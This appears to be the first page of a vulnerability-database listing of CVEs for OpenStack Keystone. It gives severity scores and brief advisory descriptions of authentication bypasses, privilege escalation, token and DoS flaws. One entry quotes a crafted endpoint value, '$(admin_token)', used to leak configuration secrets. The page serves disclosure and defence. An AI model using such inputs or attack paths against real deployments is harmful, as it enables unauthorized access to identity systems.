VYPR

Keystone

by OpenStack

pypi: keystone

Source repositories

CVEs (41)

  • CVE-2025-65073HigNov 17, 2025
    risk 0.49cvss 7.5epss 0.00

    OpenStack Keystone before 26.0.1, 27.0.0, and 28.0.0 allows a /v3/ec2tokens or /v3/s3tokens request with a valid AWS Signature to provide Keystone authorization.

  • CVE-2026-43001HigMay 1, 2026
    risk 0.44cvss 7.9epss 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. POST /v3/credentials did not validate that the caller-supplied project_id for an EC2-type credential matched the project of the authenticating application credential. This allowed an attacker holding an unrestricted…

  • CVE-2026-40683HigApr 14, 2026
    risk 0.43cvss 7.7epss 0.00

    In OpenStack Keystone before 28.0.1, the LDAP identity backend does not convert the user enabled attribute to a boolean when the user_enabled_invert configuration option is False (the default). The _ldap_res_to_model method in the UserApi class only performed string-to-boolean…

  • CVE-2015-7546HigFeb 3, 2016
    risk 0.42cvss 7.5epss 0.02

    The identity service in OpenStack Identity (Keystone) before 2015.1.3 (Kilo) and 8.0.x before 8.0.2 (Liberty) and keystonemiddleware (formerly python-keystoneclient) before 1.5.4 (Kilo) and Liberty before 2.3.3 does not properly invalidate authorization tokens when using the PKI…

  • CVE-2013-0270MedApr 12, 2013
    risk 0.35cvss 6.5epss 0.03

    A flaw was found in OpenStack Keystone. A remote attacker could exploit this vulnerability by sending a large HTTP request, specifically by providing a long tenant name when requesting a token. This could lead to a denial of service, consuming excessive CPU and memory resources…

  • CVE-2026-44394MedMay 28, 2026
    risk 0.32cvss 6.0epss 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token()…

  • CVE-2026-43000MedMay 28, 2026
    risk 0.32cvss 6.0epss 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. When combined with an application credential impersonation vulnerability, an attacker with the member role on a project can escalate to admin by chaining unrestricted application credentials with Keystone trusts. The…

  • CVE-2026-42999MedMay 28, 2026
    risk 0.32cvss 6.0epss 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone RBAC policy enforcer in enforce_call unconditionally merges the raw JSON request body into the policy enforcement dictionary via policy_dict.update(json_input.copy()), overwriting trusted target data that…

  • CVE-2026-42998MedMay 28, 2026
    risk 0.32cvss 6.0epss 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone application credential authentication plugin does not verify that the user supplied in the authentication request matches the owner of the application credential. An attacker can authenticate with their…

  • CVE-2018-14432MedJul 31, 2018
    risk 0.28cvss 5.3epss 0.02

    In the Federation component of OpenStack Keystone before 11.0.4, 12.0.0, and 13.0.0, an authenticated "GET /v3/OS-FEDERATION/projects" request may bypass intended access restrictions on listing projects. An authenticated user may discover projects they have no authority to…

  • CVE-2026-33551LowApr 10, 2026
    risk 0.16cvss 3.5epss 0.00

    An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with…

  • CVE-2021-3563Aug 26, 2022
    risk 0.00cvss epss 0.01

    A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and…

  • CVE-2012-1572Nov 12, 2019
    risk 0.00cvss epss 0.01

    OpenStack Keystone: extremely long passwords can crash Keystone by exhausting stack space

  • CVE-2013-2255Nov 1, 2019
    risk 0.00cvss epss 0.01

    HTTPSConnections in OpenStack Keystone 2013, OpenStack Compute 2013.1, and possibly other OpenStack components, fail to validate server-side SSL certificates.

  • CVE-2018-20170Dec 17, 2018
    risk 0.00cvss epss 0.01

    OpenStack Keystone through 14.0.1 has a user enumeration vulnerability because invalid usernames have much faster responses than valid ones for a POST /v3/auth/tokens request. NOTE: the vendor's position is that this is a hardening opportunity, and not necessarily an issue that…

  • CVE-2015-3646May 12, 2015
    risk 0.00cvss epss 0.03

    OpenStack Identity (Keystone) before 2014.1.5 and 2014.2.x before 2014.2.4 logs the backend_argument configuration option content, which allows remote authenticated users to obtain passwords and other sensitive backend information by reading the Keystone logs.

  • CVE-2014-0204Nov 3, 2014
    risk 0.00cvss epss 0.01

    OpenStack Identity (Keystone) before 2014.1.1 does not properly handle when a role is assigned to a group that has the same ID as a user, which allows remote authenticated users to gain privileges that are assigned to a group with the same ID.

  • CVE-2014-3520Oct 26, 2014
    risk 0.00cvss epss 0.02

    OpenStack Identity (Keystone) before 2013.2.4, 2014.x before 2014.1.2, and Juno before Juno-2 allows remote authenticated trustees to gain access to an unauthorized project for which the trustor has certain roles via the project ID in a V2 API trust token request.

  • CVE-2014-3621Oct 2, 2014
    risk 0.00cvss epss 0.02

    The catalog url replacement in OpenStack Identity (Keystone) before 2013.2.3 and 2014.1 before 2014.1.2.1 allows remote authenticated users to read sensitive configuration options via a crafted endpoint, as demonstrated by "$(admin_token)" in the publicurl endpoint field.

  • CVE-2014-5253Aug 25, 2014
    risk 0.00cvss epss 0.01

    OpenStack Identity (Keystone) 2014.1.x before 2014.1.2.1 and Juno before Juno-3 does not properly revoke tokens when a domain is invalidated, which allows remote authenticated users to retain access via a domain-scoped token for that domain.

Page 1 of 3